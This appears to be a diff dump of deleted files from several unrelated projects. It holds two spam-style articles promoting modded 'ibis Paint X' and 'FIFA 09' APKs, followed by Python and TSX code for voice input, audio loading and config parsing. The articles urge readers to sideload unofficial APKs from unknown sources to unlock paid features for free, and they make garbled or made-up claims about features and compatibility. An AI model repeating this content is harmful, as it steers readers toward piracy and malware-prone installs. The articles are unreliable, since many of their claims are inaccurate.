    • Enhances creativity: You can use all the features and tools of ibis Paint X without any limitation or restriction. You can experiment with different brushes, materials, fonts, filters, screentones, blending modes, and more. You can create amazing digital art and comics with ibis Paint X Mod APK.
    • -
    -

    How to Download and Install ibis Paint X Mod APK?

    -

    If you want to download and install ibis Paint X Mod APK on your Android device, you need to follow these simple steps:

    -

    Steps to Download and Install ibis Paint X Mod APK

    -
      -
1. Download the APK file: You need to download the APK file of ibis Paint X Mod APK from a trusted source. You can use the link below to get the latest version.
2. Enable unknown sources: You need to enable the installation of apps from unknown sources on your device. You can do this by going to Settings > Security > Unknown Sources and turning it on.
3. Install the APK file: Locate the downloaded APK file on your device and tap on it to install it. You may need to grant some permissions during the installation process (a sketch of installing from a computer with adb follows this list).
4. Launch the app: Tap on the app's icon on your home screen or app drawer, and enjoy all the premium features of ibis Paint X for free.
    -
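If you prefer to download the APK on a computer and push it to your phone over USB, the same installation can be done with adb (the Android Debug Bridge). The sketch below is an illustration, not an official installer for the app: it assumes adb is installed and on your PATH, USB debugging is enabled on the phone, and the file path is a placeholder for wherever you saved the APK.

```python
import subprocess

# Hypothetical path -- point this at the APK you downloaded on the computer.
APK_PATH = "ibis-paint-x-mod.apk"

def adb(*args: str) -> subprocess.CompletedProcess:
    """Run an adb command and return the completed process object."""
    return subprocess.run(["adb", *args], capture_output=True, text=True)

if __name__ == "__main__":
    # The phone should appear with the state "device" (not "unauthorized").
    print(adb("devices").stdout)

    # -r replaces an already-installed copy instead of failing.
    result = adb("install", "-r", APK_PATH)
    if result.returncode == 0:
        print("Install finished:", result.stdout.strip())
    else:
        print("Install failed:", result.stderr.strip())
```

Keep in mind that Android will refuse to replace an app whose signature does not match the installed one, so the original version may need to be uninstalled first.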

    Tips to Use ibis Paint X Mod APK

    -

    Some of the tips to use ibis Paint X Mod APK are:

    -
      -
    • Watch tutorials: If you are new to ibis Paint X or want to learn more about its features and tools, you can watch tutorials on the app or on YouTube. You can also visit the official website of ibis Paint X for more information and support.
    • -
    • Join the community: If you want to share your artworks, get feedback, or learn from other users, you can join the community site "ibispaint.com". You can also follow ibis Paint X on social media platforms such as Facebook, Twitter, Instagram, and TikTok.
    • -
    • Backup your data: If you want to save your drawings, videos, materials, fonts, and settings, you can backup your data on the cloud or on your device. You can do this by going to Settings > Backup/Restore > Backup Data or Restore Data.
    • -
    -

    Alternatives to ibis Paint X Mod APK

    -

    If you are looking for some alternatives to ibis Paint X Mod APK, you can try these apps:

    -


    -

    List of Alternatives to ibis Paint X Mod APK

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Name | Description | Features |
| --- | --- | --- |
| MediBang Paint | A lightweight digital painting and comic creation app that comes with over 1000 brushes, tones, backgrounds, textures, fonts and more. | Cloud saving and sharing; comic creation tools; cross-platform compatibility; customizable shortcuts; collaboration feature; ads-free |
| Procreate Pocket | A powerful sketching, painting and illustration app that offers a complete set of artistic tools for creating stunning artworks on your iPhone. | 250+ brushes; layer system; advanced color picker; time-lapse recording; animation assist; pressure sensitivity; no ads or in-app purchases |
| SketchBook | A professional-grade drawing and painting app that provides a natural drawing experience with over 170 customizable brushes, rulers, guides, and more. | Layer editor; scan sketch feature; predictive stroke; Copic color library; symmetry tools; distort transform; no ads or in-app purchases |
| Clip Studio Paint | A versatile drawing and painting app that is ideal for creating comics, manga, illustrations, animations, and more. | 1000+ brushes; vector layers; 3D models and materials; frame-by-frame animation; AI colorization; text tools; no ads or in-app purchases |
| Adobe Photoshop Sketch | A simple and expressive drawing app that lets you create realistic sketches and paintings with various brushes, pencils, pens, markers, and more. | Layer support; custom brushes; Adobe Creative Cloud integration; perspective grids; shape stencils; no ads or in-app purchases |
    -

    Comparison of Alternatives to ibis Paint X Mod APK

    -

    Here is a comparison of the alternatives to ibis Paint X Mod APK based on some criteria:

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| Criteria | MediBang Paint | Procreate Pocket | SketchBook | Clip Studio Paint | Adobe Photoshop Sketch |
| --- | --- | --- | --- | --- | --- |
| Price | Free | $4.99 | Free | $0.99/month or $9.49/year | Free |
| Rating | 4.5/5.0 | 4.7/5.0 | 4.3/5.0 | 4.6/5.0 | 4.2/5.0 |
| Downloads | 10M+ | 1M+ | 10M+ | 10M+ | 10M+ |
| User reviews | "Great app for beginners and professionals alike. It has a lot of features and tools that are easy to use and customize." | "Best drawing app ever. It has everything you need to create amazing artworks on your phone." | "Very smooth and responsive app. It has a lot of brushes and options to choose from. It also works well with a stylus." | "The best app for manga and comic creation. It has a lot of features and functions that are very useful and convenient." | "A simple and fun app to sketch and paint. It has a nice interface and a good selection of brushes." |
    -

    Conclusion

    -

    In conclusion, ibis Paint X is a versatile drawing app that provides a smooth and comfortable drawing experience with over 15000 brushes, over 15000 materials, over 1000 fonts, 80 filters, 46 screentones, 27 blending modes, and various ruler and clipping mask features. It is an app that allows you to create stunning digital art and comics on your Android device. You can also share your drawing process as a video and learn from other users' drawing techniques on the community site "ibispaint.com".

    -

    If you want to enjoy all the premium features of ibis Paint X for free, you can download ibis Paint X Mod APK. It is a modified version of ibis Paint X that allows you to access all the prime materials, fonts, filters, and more without paying anything. You can also remove the watermark from your videos and export them in high resolution. With ibis Paint X Mod APK, you can have unlimited fun and creativity with drawing.

    -

    If you are looking for some alternatives to ibis Paint X Mod APK, you can try MediBang Paint, Procreate Pocket, SketchBook, Clip Studio Paint, or Adobe Photoshop Sketch. They are all great drawing and painting apps that offer different features and tools for creating amazing artworks on your device.

    -

    We hope this article has helped you to learn more about ibis Paint X, ibis Paint X Mod APK, and some alternatives to it. If you have any questions or feedback, please feel free to leave a comment below. Happy drawing!

    -

    FAQs

    -

    Here are some frequently asked questions about ibis Paint X and ibis Paint X Mod APK:

    -

    Is ibis Paint X safe to use?

    -

    Yes, ibis Paint X is safe to use. It is a legitimate app that is developed by ibis mobile inc., a Japanese company that specializes in developing apps for digital art and comics. It is also available on the Google Play Store and the App Store. However, you should be careful when downloading ibis Paint X Mod APK from third-party sources, as they may contain viruses or malware that can harm your device.

    -

    Is ibis Paint X free to use?

    -

    Yes, ibis Paint X is free to use. You can download and use the app without paying anything. However, if you want to access the prime materials, fonts, filters, and more, you need to watch ads or pay for the prime membership. Alternatively, you can download ibis Paint X Mod APK and enjoy all the premium features for free.

    -

    How do I update ibis Paint X Mod APK?

    -

    If you want to update ibis Paint X Mod APK, you need to download the latest version of the APK file from a trusted source and install it on your device. You may need to uninstall the previous version of the app before installing the new one. You should also backup your data before updating the app.

    -

    Can I use ibis Paint X on PC?

    -

    No, ibis Paint X is not available for PC. It is only compatible with Android and iOS devices. However, you can use an Android emulator such as BlueStacks or Nox Player to run ibis Paint X on your PC. You can also use a drawing tablet or a stylus to draw on your PC with ibis Paint X.

    -

    Can I use ibis Paint X offline?

    -

    Yes, you can use ibis Paint X offline. You don't need an internet connection to draw or save your artworks on your device. However, you need an internet connection to access the prime materials and fonts, share your videos or artworks on social media or the community site "ibispaint.com", or update the app.

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/1phancelerku/anime-remove-background/FIFA 09 APK for Android - The Ultimate Guide to Download and Install.md b/spaces/1phancelerku/anime-remove-background/FIFA 09 APK for Android - The Ultimate Guide to Download and Install.md deleted file mode 100644 index 88ea3762750426a9fa37acc28f683dae17f0ec31..0000000000000000000000000000000000000000 --- a/spaces/1phancelerku/anime-remove-background/FIFA 09 APK for Android - The Ultimate Guide to Download and Install.md +++ /dev/null @@ -1,98 +0,0 @@ - -

    How to Download FIFA 09 APK for Android

    -

    If you are looking for a fun and realistic football game to play on your Android device, you should try FIFA 09. This is one of the best games in the FIFA series, developed by EA Sports. It has amazing graphics, smooth controls, and diverse content that will keep you entertained for hours. In this article, we will tell you what FIFA 09 is, what are its features and benefits, and how to download FIFA 09 APK for Android.

    -

What is FIFA 09 and why you should play it

    -

    FIFA 09 is a football simulation game developed by EA Sports. It was released in October 2008 for various platforms, including PC, consoles, and mobile devices. It has over 250 gameplay improvements and enhancements that make it more realistic and responsive. It has a variety of game modes, such as Be a Pro, Manager Mode, Ultimate Team, and Online Multiplayer.

    -

    download fifa 09 apk for android


    Download Zip ✺✺✺ https://jinyurl.com/2uNSJh



    -

    FIFA 09 is a football simulation game developed by EA Sports

    -

    EA Sports is a division of Electronic Arts that specializes in sports video games. It is one of the most popular and successful game developers in the industry. EA Sports has produced many acclaimed titles, such as Madden NFL, NBA Live, NHL, and FIFA. FIFA is the flagship franchise of EA Sports, and it has been running since 1993. FIFA 09 is the 16th installment in the series, and it is considered one of the best by critics and fans alike.

    -

    FIFA 09 is a fun and exciting game for football fans and gamers alike

    -

    If you love football, you will love FIFA 09. This game lets you play as your favorite teams and players from around the world. You can choose from over 500 licensed teams and more than 30 leagues, including the Premier League, La Liga, Bundesliga, Serie A, and more. You can also create your own custom teams and players with the Ultimate Team mode. This mode allows you to collect cards of players, kits, stadiums, and other items, and use them to build your dream team.

    -

    But playing FIFA 09 is not just about choosing teams and players. It is also about competing with other players online in 10 vs. 10 matches or tournaments. You can join or create your own club with your friends or other players, and play against other clubs from around the world. You can also chat with your teammates and opponents using the voice or text chat feature. Playing online is a great way to test your skills and have fun with other football enthusiasts.

    What are the features and benefits of FIFA 09

    -

    FIFA 09 is not just a game, it is an experience. It has stunning graphics and animations that bring the game to life. It has smooth and intuitive controls that make it easy to play. It has a rich and diverse content that keeps you entertained for hours. Here are some of the features and benefits of FIFA 09 that you should know.

    -

    FIFA 09 has stunning graphics and animations that bring the game to life

    -

    One of the things that make FIFA 09 stand out is its visual quality. It uses leading-edge visuals that exploit the power of high-spec gaming devices. It features photorealistic likenesses of star players and stadiums. It has a revamped collision system that calculates speed, weight, and power when players collide. It has subtle animations that enable you to take first-time shots, volleys, and headers. It also has a dynamic weather system that affects the gameplay and atmosphere. You will feel like you are watching a real match on TV or playing on the pitch yourself.

    -

    FIFA 09 has smooth and intuitive controls that make it easy to play

    -

    Another thing that makes FIFA 09 enjoyable is its control scheme. It has a customizable control scheme that suits your preferences and device. You can choose from different options, such as buttons, gestures, or tilt. You can also adjust the sensitivity and responsiveness of the controls. You can also use a new jostle system that allows you to control the ball with more precision and skill. You can use the right analog stick to shield the ball, push off defenders, or perform tricks. You can also use the left trigger to sprint, the right trigger to slow down, or the shoulder buttons to switch players or tactics.

    -

    FIFA 09 has a rich and diverse content that keeps you entertained for hours

    -

    The last thing that makes FIFA 09 amazing is its content. It has over 500 licensed teams and more than 30 leagues from around the world. You can play as any team or player you want, from Manchester United to Barcelona, from Cristiano Ronaldo to Lionel Messi. You can also play in different game modes, such as Be a Pro, Manager Mode, Ultimate Team, and Online Multiplayer. Each mode has its own challenges and rewards. You can also play in different minigames and challenges that test your skills and knowledge. You can play in penalty shootouts, free kicks, dribbling courses, trivia quizzes, and more.

    How to download FIFA 09 APK for Android

    -

    Now that you know what FIFA 09 is and what it offers, you might be wondering how to download it on your Android device. Well, you can't find it on the Google Play Store, because it is an old game that is not compatible with the latest Android versions. But don't worry, there is a way to play it on your device. You just need to download FIFA 09 APK for Android.

    -


    -

    FIFA 09 APK is a file that allows you to install the game on your Android device without using the Google Play Store

    -

    APK stands for Android Package Kit, and it is a file format that contains all the necessary components of an Android app. It is useful if you have a device that is not compatible with the official version or if you want to save storage space. It is also useful if you want to play the game offline or with mods and cheats.
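An APK is, at the file level, an ordinary ZIP archive that bundles the app's manifest, compiled code, resources, and signature. If you are curious what is inside a package before installing it, a short Python sketch like the one below will list its entries; the file name is a placeholder for any APK you have on disk.

```python
import zipfile

# Hypothetical file name -- any APK you have on disk will do.
APK_PATH = "fifa09.apk"

with zipfile.ZipFile(APK_PATH) as apk:
    names = apk.namelist()
    print(f"{len(names)} entries in the package, for example:")
    # Typical entries: AndroidManifest.xml, classes.dex, resources.arsc,
    # res/... (layouts and images) and META-INF/... (the package signature).
    for name in names[:10]:
        size = apk.getinfo(name).file_size
        print(f"  {name}  ({size} bytes)")
```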

    -

    To download FIFA 09 APK for Android, you need to follow these steps:

    -

    Downloading FIFA 09 APK for Android is not difficult, but you need to be careful and follow some precautions. Here are the steps you need to take:

    -
      -
1. Find a reliable source that offers the APK file for free. You can use one of these links: . Make sure you scan the file for viruses and malware before downloading it.
2. Download the APK file to your device or transfer it from your PC using a USB cable or Bluetooth connection (a quick device-check sketch follows this list).
3. Enable the installation of apps from unknown sources on your device. You can do this by going to Settings > Security > Unknown Sources and toggling it on.
4. Locate the APK file on your device using a file manager app or your browser's downloads folder. Tap on it to start the installation process.
5. Follow the instructions on the screen to complete the installation. You may need to grant some permissions or accept some terms and conditions.
6. Launch the game from your app drawer or home screen and enjoy playing FIFA 09 on your Android device.
    -
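If you copy the APK from a PC, you can also query the phone over USB before installing, for example to confirm its Android version and how much space is left. The sketch below is a rough illustration that assumes adb is installed on the PC and USB debugging is enabled on the phone; the exact output of df varies between devices.

```python
import subprocess

def adb_shell(command: str) -> str:
    """Run a shell command on the connected phone via adb and return its output."""
    result = subprocess.run(["adb", "shell", command],
                            capture_output=True, text=True)
    return result.stdout.strip()

if __name__ == "__main__":
    release = adb_shell("getprop ro.build.version.release")  # e.g. "13"
    sdk = adb_shell("getprop ro.build.version.sdk")          # e.g. "33"
    storage = adb_shell("df -h /data | tail -n 1")           # free space for apps
    print(f"Android version: {release} (API level {sdk})")
    print(f"/data partition: {storage}")
```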

    Conclusion

    -

    FIFA 09 is one of the best football games ever made, and you can play it on your Android device with FIFA 09 APK. It has amazing graphics, smooth controls, and diverse content that will keep you entertained for hours. You can play as your favorite teams and players, create your own custom teams and players, compete with other players online, and more. You just need to follow some simple steps to download and install the game on your device.

    -

    Here are some tips or recommendations for playing FIFA 09 on Android:

    -
      -
    • Make sure you have enough storage space and battery life on your device before playing the game.
    • -
    • Adjust the graphics settings and sound options according to your device's performance and preferences.
    • -
    • Use a Wi-Fi connection or a data plan with enough bandwidth when playing online.
    • -
    • Keep your device updated with the latest software and security patches.
    • -
    • Have fun and enjoy the game!
    • -
    -

    We hope you found this article helpful and informative. If you have any feedback or questions, please feel free to leave them in the comments section below. We would love to hear from you!

    -

    Frequently Asked Questions

    -

    Here are some of the most common questions that people ask about FIFA 09 APK for Android:

    -

    Q: Is FIFA 09 APK for Android safe to download and install?

    -

    A: Yes, as long as you download it from a reliable source and scan it for viruses and malware before installing it. However, we cannot guarantee that it will work perfectly on every device or that it will not cause any issues or damage to your device. Use it at your own risk and discretion.

    -

    Q: Is FIFA 09 APK for Android legal to use?

    -

    A: That depends on where you live and what laws apply there. In some countries, downloading and using APK files from unknown sources may be considered illegal or infringing on intellectual property rights. In other countries, it may be legal or tolerated as long as you own a copy of the original game or app. We advise you to check your local laws and regulations before downloading and using FIFA 09 APK for Android.

    -

    Q: Is FIFA 09 APK for Android compatible with my device?

    -

A: FIFA 09 APK for Android is designed to work on most Android devices that run on Android 4.0 or higher. However, some devices may not be compatible due to hardware limitations, software conflicts, or other reasons. If you encounter any problems or errors when playing the game, you may try to uninstall and reinstall the game, clear the cache and data, or contact the developer for support.

    -

    Q: How can I update FIFA 09 APK for Android?

    -

    A: FIFA 09 APK for Android is not an official version of the game, so it does not receive regular updates from EA Sports. However, some sources may offer updated versions of the APK file with new features or bug fixes. You can check the source where you downloaded the APK file for any updates or look for other sources that offer newer versions. To update the game, you need to download and install the new APK file over the old one.

    -

    Q: Can I play FIFA 09 APK for Android with a controller or a keyboard?

    -

    A: Yes, you can play FIFA 09 APK for Android with a controller or a keyboard if your device supports them. You can connect your controller or keyboard to your device via Bluetooth, USB, or OTG cable. You can also use an app like Octopus or Panda Gamepad Pro to map the buttons and keys to the game controls. However, some controllers or keyboards may not work well with the game or may cause some issues or errors.

    -

    -

    This is the end of the article. Thank you for reading and I hope you learned something new and useful. If you have any questions or comments, please leave them below and I will try to answer them as soon as possible. Have a great day!

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/2023Liu2023/bingo/src/components/voice.tsx b/spaces/2023Liu2023/bingo/src/components/voice.tsx deleted file mode 100644 index 074d0e145229947282a472bd84f6578cf0b3c71c..0000000000000000000000000000000000000000 --- a/spaces/2023Liu2023/bingo/src/components/voice.tsx +++ /dev/null @@ -1,52 +0,0 @@ -import React, { useEffect } from 'react' -import { useSetAtom } from 'jotai' -import { useBing } from '@/lib/hooks/use-bing' -import Image from 'next/image' -import VoiceIcon from '@/assets/images/voice.svg' -import VoiceButton from './ui/voice' -import { SR } from '@/lib/bots/bing/sr' -import { voiceListenAtom } from '@/state' - -const sr = new SR(['发送', '清空', '退出']) - -const Voice = ({ setInput, input, sendMessage, isSpeaking }: Pick, 'setInput' | 'sendMessage' | 'input' | 'isSpeaking'>) => { - const setListen = useSetAtom(voiceListenAtom) - useEffect(() => { - if (sr.listening) return - sr.transcript = !isSpeaking - }, [isSpeaking]) - - useEffect(() => { - sr.onchange = (msg: string, command?: string) => { - switch (command) { - case '退出': - sr.stop() - break; - case '发送': - sendMessage(input) - case '清空': - setInput('') - break; - default: - setInput(input + msg) - } - } - }, [input]) - - const switchSR = (enable: boolean = false) => { - setListen(enable) - if (enable) { - sr.start() - } else { - sr.stop() - } - } - - return sr.listening ? ( - switchSR(false)} /> - ) : ( - start voice switchSR(true)} /> - ) -}; - -export default Voice; diff --git a/spaces/801artistry/RVC801/infer/lib/audio.py b/spaces/801artistry/RVC801/infer/lib/audio.py deleted file mode 100644 index 9ad4ff74218957cf18782fa71add40a734b47e78..0000000000000000000000000000000000000000 --- a/spaces/801artistry/RVC801/infer/lib/audio.py +++ /dev/null @@ -1,197 +0,0 @@ -import librosa -import numpy as np -import av -from io import BytesIO -import ffmpeg -import os -import sys - -import random -from infer.lib.csvutil import CSVutil -#import csv - -platform_stft_mapping = { - 'linux': 'stftpitchshift', - 'darwin': 'stftpitchshift', - 'win32': 'stftpitchshift.exe', -} - -stft = platform_stft_mapping.get(sys.platform) - -def wav2(i, o, format): - inp = av.open(i, 'rb') - if format == "m4a": format = "mp4" - out = av.open(o, 'wb', format=format) - if format == "ogg": format = "libvorbis" - if format == "mp4": format = "aac" - - ostream = out.add_stream(format) - - for frame in inp.decode(audio=0): - for p in ostream.encode(frame): out.mux(p) - - for p in ostream.encode(None): out.mux(p) - - out.close() - inp.close() - -def audio2(i, o, format, sr): - inp = av.open(i, 'rb') - out = av.open(o, 'wb', format=format) - if format == "ogg": format = "libvorbis" - if format == "f32le": format = "pcm_f32le" - - ostream = out.add_stream(format, channels=1) - ostream.sample_rate = sr - - for frame in inp.decode(audio=0): - for p in ostream.encode(frame): out.mux(p) - - out.close() - inp.close() - -def load_audion(file, sr): - try: - file = ( - file.strip(" ").strip('"').strip("\n").strip('"').strip(" ") - ) # 防止小白拷路径头尾带了空格和"和回车 - with open(file, "rb") as f: - with BytesIO() as out: - audio2(f, out, "f32le", sr) - return np.frombuffer(out.getvalue(), np.float32).flatten() - - except AttributeError: - audio = file[1] / 32768.0 - if len(audio.shape) == 2: - audio = np.mean(audio, -1) - return librosa.resample(audio, orig_sr=file[0], target_sr=16000) - - except Exception as e: - raise RuntimeError(f"Failed to load audio: {e}") - - - - -def load_audio(file, sr, DoFormant=False, Quefrency=1.0, 
Timbre=1.0): - converted = False - DoFormant, Quefrency, Timbre = CSVutil("csvdb/formanting.csv", "r", "formanting") - try: - # https://github.com/openai/whisper/blob/main/whisper/audio.py#L26 - # This launches a subprocess to decode audio while down-mixing and resampling as necessary. - # Requires the ffmpeg CLI and `ffmpeg-python` package to be installed. - file = ( - file.strip(" ").strip('"').strip("\n").strip('"').strip(" ") - ) # 防止小白拷路径头尾带了空格和"和回车 - file_formanted = file.strip(" ").strip('"').strip("\n").strip('"').strip(" ") - - # print(f"dofor={bool(DoFormant)} timbr={Timbre} quef={Quefrency}\n") - - if ( - lambda DoFormant: True - if DoFormant.lower() == "true" - else (False if DoFormant.lower() == "false" else DoFormant) - )(DoFormant): - numerator = round(random.uniform(1, 4), 4) - # os.system(f"stftpitchshift -i {file} -q {Quefrency} -t {Timbre} -o {file_formanted}") - # print('stftpitchshift -i "%s" -p 1.0 --rms -w 128 -v 8 -q %s -t %s -o "%s"' % (file, Quefrency, Timbre, file_formanted)) - - if not file.endswith(".wav"): - if not os.path.isfile(f"{file_formanted}.wav"): - converted = True - # print(f"\nfile = {file}\n") - # print(f"\nfile_formanted = {file_formanted}\n") - converting = ( - ffmpeg.input(file_formanted, threads=0) - .output(f"{file_formanted}.wav") - .run( - cmd=["ffmpeg", "-nostdin"], - capture_stdout=True, - capture_stderr=True, - ) - ) - else: - pass - - file_formanted = ( - f"{file_formanted}.wav" - if not file_formanted.endswith(".wav") - else file_formanted - ) - - print(f" · Formanting {file_formanted}...\n") - - os.system( - '%s -i "%s" -q "%s" -t "%s" -o "%sFORMANTED_%s.wav"' - % ( - stft, - file_formanted, - Quefrency, - Timbre, - file_formanted, - str(numerator), - ) - ) - - print(f" · Formanted {file_formanted}!\n") - - # filepraat = (os.path.abspath(os.getcwd()) + '\\' + file).replace('/','\\') - # file_formantedpraat = ('"' + os.path.abspath(os.getcwd()) + '/' + 'formanted'.join(file_formanted) + '"').replace('/','\\') - # print("%sFORMANTED_%s.wav" % (file_formanted, str(numerator))) - - out, _ = ( - ffmpeg.input( - "%sFORMANTED_%s.wav" % (file_formanted, str(numerator)), threads=0 - ) - .output("-", format="f32le", acodec="pcm_f32le", ac=1, ar=sr) - .run( - cmd=["ffmpeg", "-nostdin"], capture_stdout=True, capture_stderr=True - ) - ) - - try: - os.remove("%sFORMANTED_%s.wav" % (file_formanted, str(numerator))) - except Exception: - pass - print("couldn't remove formanted type of file") - - else: - out, _ = ( - ffmpeg.input(file, threads=0) - .output("-", format="f32le", acodec="pcm_f32le", ac=1, ar=sr) - .run( - cmd=["ffmpeg", "-nostdin"], capture_stdout=True, capture_stderr=True - ) - ) - except Exception as e: - raise RuntimeError(f"Failed to load audio: {e}") - - if converted: - try: - os.remove(file_formanted) - except Exception: - pass - print("couldn't remove converted type of file") - converted = False - - return np.frombuffer(out, np.float32).flatten() - - -def check_audio_duration(file): - try: - file = file.strip(" ").strip('"').strip("\n").strip('"').strip(" ") - - probe = ffmpeg.probe(file) - - duration = float(probe['streams'][0]['duration']) - - if duration < 0.76: - print( - f"\n------------\n" - f"Audio file, {file.split('/')[-1]}, under ~0.76s detected - file is too short. Target at least 1-2s for best results." 
- f"\n------------\n\n" - ) - return False - - return True - except Exception as e: - raise RuntimeError(f"Failed to check audio duration: {e}") \ No newline at end of file diff --git a/spaces/A666sxr/Genshin_TTS/monotonic_align/__init__.py b/spaces/A666sxr/Genshin_TTS/monotonic_align/__init__.py deleted file mode 100644 index 3d7009c40fea3a98168e3e3bc9ae061e91327422..0000000000000000000000000000000000000000 --- a/spaces/A666sxr/Genshin_TTS/monotonic_align/__init__.py +++ /dev/null @@ -1,19 +0,0 @@ -import numpy as np -import torch -from .monotonic_align.core import maximum_path_c - - -def maximum_path(neg_cent, mask): - """ Cython optimized version. - neg_cent: [b, t_t, t_s] - mask: [b, t_t, t_s] - """ - device = neg_cent.device - dtype = neg_cent.dtype - neg_cent = neg_cent.data.cpu().numpy().astype(np.float32) - path = np.zeros(neg_cent.shape, dtype=np.int32) - - t_t_max = mask.sum(1)[:, 0].data.cpu().numpy().astype(np.int32) - t_s_max = mask.sum(2)[:, 0].data.cpu().numpy().astype(np.int32) - maximum_path_c(path, neg_cent, t_t_max, t_s_max) - return torch.from_numpy(path).to(device=device, dtype=dtype) diff --git a/spaces/AIGC-Audio/AudioGPT/NeuralSeq/utils/hparams.py b/spaces/AIGC-Audio/AudioGPT/NeuralSeq/utils/hparams.py deleted file mode 100644 index c76c5cfc896308d9a84c6254a7ca00b8235e7516..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/AudioGPT/NeuralSeq/utils/hparams.py +++ /dev/null @@ -1,129 +0,0 @@ -import argparse -import os -import yaml - -global_print_hparams = True -hparams = {} - - -class Args: - def __init__(self, **kwargs): - for k, v in kwargs.items(): - self.__setattr__(k, v) - - -def override_config(old_config: dict, new_config: dict): - for k, v in new_config.items(): - if isinstance(v, dict) and k in old_config: - override_config(old_config[k], new_config[k]) - else: - old_config[k] = v - - -def set_hparams(config='', exp_name='', hparams_str='', print_hparams=True, global_hparams=True): - if config == '' and exp_name == '': - parser = argparse.ArgumentParser(description='') - parser.add_argument('--config', type=str, default='', - help='location of the data corpus') - parser.add_argument('--exp_name', type=str, default='', help='exp_name') - parser.add_argument('-hp', '--hparams', type=str, default='', - help='location of the data corpus') - parser.add_argument('--infer', action='store_true', help='infer') - parser.add_argument('--validate', action='store_true', help='validate') - parser.add_argument('--reset', action='store_true', help='reset hparams') - parser.add_argument('--remove', action='store_true', help='remove old ckpt') - parser.add_argument('--debug', action='store_true', help='debug') - args, unknown = parser.parse_known_args() - print("| Unknow hparams: ", unknown) - else: - args = Args(config=config, exp_name=exp_name, hparams=hparams_str, - infer=False, validate=False, reset=False, debug=False, remove=False) - global hparams - assert args.config != '' or args.exp_name != '' - if args.config != '': - assert os.path.exists(args.config) - - config_chains = [] - loaded_config = set() - - def load_config(config_fn): - # deep first inheritance and avoid the second visit of one node - if not os.path.exists(config_fn): - return {} - with open(config_fn) as f: - hparams_ = yaml.safe_load(f) - loaded_config.add(config_fn) - if 'base_config' in hparams_: - ret_hparams = {} - if not isinstance(hparams_['base_config'], list): - hparams_['base_config'] = [hparams_['base_config']] - for c in hparams_['base_config']: - if c.startswith('.'): - c = 
f'{os.path.dirname(config_fn)}/{c}' - c = os.path.normpath(c) - if c not in loaded_config: - override_config(ret_hparams, load_config(c)) - override_config(ret_hparams, hparams_) - else: - ret_hparams = hparams_ - config_chains.append(config_fn) - return ret_hparams - - saved_hparams = {} - args_work_dir = '' - if args.exp_name != '': - args_work_dir = f'{args.exp_name}' # modified - ckpt_config_path = f'{args_work_dir}/config.yaml' - if os.path.exists(ckpt_config_path): - with open(ckpt_config_path) as f: - saved_hparams_ = yaml.safe_load(f) - if saved_hparams_ is not None: - saved_hparams.update(saved_hparams_) - hparams_ = {} - if args.config != '': - hparams_.update(load_config(args.config)) - if not args.reset: - hparams_.update(saved_hparams) - hparams_['work_dir'] = args_work_dir - - # Support config overriding in command line. Support list type config overriding. - # Examples: --hparams="a=1,b.c=2,d=[1 1 1]" - if args.hparams != "": - for new_hparam in args.hparams.split(","): - k, v = new_hparam.split("=") - v = v.strip("\'\" ") - config_node = hparams_ - for k_ in k.split(".")[:-1]: - config_node = config_node[k_] - k = k.split(".")[-1] - if v in ['True', 'False'] or type(config_node[k]) in [bool, list, dict]: - if type(config_node[k]) == list: - v = v.replace(" ", ",") - config_node[k] = eval(v) - else: - config_node[k] = type(config_node[k])(v) - if args_work_dir != '' and args.remove: - answer = input("REMOVE old checkpoint? Y/N [Default: N]: ") - if answer.lower() == "y": - remove_file(args_work_dir) - if args_work_dir != '' and (not os.path.exists(ckpt_config_path) or args.reset) and not args.infer: - os.makedirs(hparams_['work_dir'], exist_ok=True) - with open(ckpt_config_path, 'w') as f: - yaml.safe_dump(hparams_, f) - - hparams_['infer'] = args.infer - hparams_['debug'] = args.debug - hparams_['validate'] = args.validate - hparams_['exp_name'] = args.exp_name - global global_print_hparams - if global_hparams: - hparams.clear() - hparams.update(hparams_) - if print_hparams and global_print_hparams and global_hparams: - print('| Hparams chains: ', config_chains) - print('| Hparams: ') - for i, (k, v) in enumerate(sorted(hparams_.items())): - print(f"\033[;33;m{k}\033[0m: {v}, ", end="\n" if i % 5 == 4 else "") - print("") - global_print_hparams = False - return hparams_ \ No newline at end of file diff --git a/spaces/AIGC-Audio/AudioGPT/audio_to_text/captioning/models/encoder.py b/spaces/AIGC-Audio/AudioGPT/audio_to_text/captioning/models/encoder.py deleted file mode 100644 index 0d6d8e87e0ed07abc04f6e79b0fa08cd102398a0..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/AudioGPT/audio_to_text/captioning/models/encoder.py +++ /dev/null @@ -1,686 +0,0 @@ -# -*- coding: utf-8 -*- - -import math -import copy - -import torch -import torch.nn as nn -import torch.nn.functional as F -from torchaudio import transforms -from torchlibrosa.augmentation import SpecAugmentation - -from .utils import mean_with_lens, max_with_lens, \ - init, pack_wrapper, generate_length_mask, PositionalEncoding - - -def init_layer(layer): - """Initialize a Linear or Convolutional layer. """ - nn.init.xavier_uniform_(layer.weight) - - if hasattr(layer, 'bias'): - if layer.bias is not None: - layer.bias.data.fill_(0.) - - -def init_bn(bn): - """Initialize a Batchnorm layer. """ - bn.bias.data.fill_(0.) - bn.weight.data.fill_(1.) 
- - -class BaseEncoder(nn.Module): - - """ - Encode the given audio into embedding - Base encoder class, cannot be called directly - All encoders should inherit from this class - """ - - def __init__(self, spec_dim, fc_feat_dim, attn_feat_dim): - super(BaseEncoder, self).__init__() - self.spec_dim = spec_dim - self.fc_feat_dim = fc_feat_dim - self.attn_feat_dim = attn_feat_dim - - - def forward(self, x): - ######################### - # an encoder first encodes audio feature into embedding, obtaining - # `encoded`: { - # fc_embs: [N, fc_emb_dim], - # attn_embs: [N, attn_max_len, attn_emb_dim], - # attn_emb_lens: [N,] - # } - ######################### - raise NotImplementedError - - -class Block2D(nn.Module): - - def __init__(self, cin, cout, kernel_size=3, padding=1): - super().__init__() - self.block = nn.Sequential( - nn.BatchNorm2d(cin), - nn.Conv2d(cin, - cout, - kernel_size=kernel_size, - padding=padding, - bias=False), - nn.LeakyReLU(inplace=True, negative_slope=0.1)) - - def forward(self, x): - return self.block(x) - - -class LinearSoftPool(nn.Module): - """LinearSoftPool - Linear softmax, takes logits and returns a probability, near to the actual maximum value. - Taken from the paper: - A Comparison of Five Multiple Instance Learning Pooling Functions for Sound Event Detection with Weak Labeling - 